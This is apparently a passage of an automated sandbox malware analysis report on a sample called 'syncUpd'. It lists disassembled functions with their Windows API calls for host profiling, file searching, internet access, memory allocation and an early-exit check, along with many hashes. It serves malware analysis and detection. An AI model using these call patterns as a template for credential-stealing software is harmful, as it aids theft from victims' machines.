                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1103761159-0
                                                                                                                                                                                                                                  • Opcode ID: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                  • Instruction ID: b86936f0f7b92ad6105a5e8d9325c57b614f4cde8fc05540e07f2d0ff83aec39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c8d233814077f36e701fc9dcba40fcf29c53b912e4e1fc8df77dce1fb5e496
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BE0867098570CBBE7309BA0DD0AB1976689B08B06F101055F7097A1D0C6B425008699
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004119B0 Relevance: 3.1, APIs: 2, Instructions: 66stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004119C8
                                                                                                                                                                                                                                    • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                    • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 00411A4D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3409980764-0
                                                                                                                                                                                                                                  • Opcode ID: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                  • Instruction ID: 5fc3070f54b5ba386e916c7c3ae22cc6ad81f817c7a7f871d2ab45b9afc63085
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 975833a798ef07385fb740c26f6e35f7306421425023d288693ea324a83a39c3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19215471900108EBCB14FFA5CC55FED7B79AF44345F10805AF51A97151EB386B84CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401120 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 752954902-0
                                                                                                                                                                                                                                  • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                  • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040ACE0 Relevance: 2.9, APIs: 2, Instructions: 387stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                    • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 574041509-0
                                                                                                                                                                                                                                  • Opcode ID: 6412797f300a884283d486a0320f7f58c85081bc8423b287f1b371c7783b466e
                                                                                                                                                                                                                                  • Instruction ID: df99340f366afcb3d937a345db0e295b6fae9bf0b5ece921659d29683b3ff0c0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6412797f300a884283d486a0320f7f58c85081bc8423b287f1b371c7783b466e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CE114769101189BCF15EBA1DC92EEE773DBF54308F41415EF10676091EF38AA89CBA8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040AA20 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                    • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                    • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                    • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                                                                                                                                                    • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                    • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,0071DC68), ref: 00404ED9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3635112192-0
                                                                                                                                                                                                                                  • Opcode ID: fef6c8789cd31f81e9383324ae63ffdec12e0a5ddde6342aa13fdff4a07eac6f
                                                                                                                                                                                                                                  • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fef6c8789cd31f81e9383324ae63ffdec12e0a5ddde6342aa13fdff4a07eac6f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004114C0 Relevance: 2.6, APIs: 2, Instructions: 100COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00411550
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 626452242-0
                                                                                                                                                                                                                                  • Opcode ID: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                  • Instruction ID: 8f9af232e05b2939ec69b712380268a2006cbed21c6953bc19412128f28bf8b7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 46fcbcde96b391d8a91c7de27c3ae99c7866997ac8e62baa93d065818f15697d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0641F770A00A289FDB24DB58CC95BDBB7B5BB48702F4091C9A618A72E0D7716EC6CF54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406050 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                  • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401060 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                  • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415490 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
                                                                                                                                                                                                                                  • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7bf405bd421a40d19a8bf3ca1e3b15e31b56f02cda8d4317b7777f73d14c9f2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                    • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                  • Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                  • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                    • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                    • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,0071DA18,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                    • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000011.00000002.3150779278.0000000000400000.00000040.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000447000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000549000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000624000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000011.00000002.3150779278.0000000000636000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_17_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1004333139-0
                                                                                                                                                                                                                                  • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                  • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%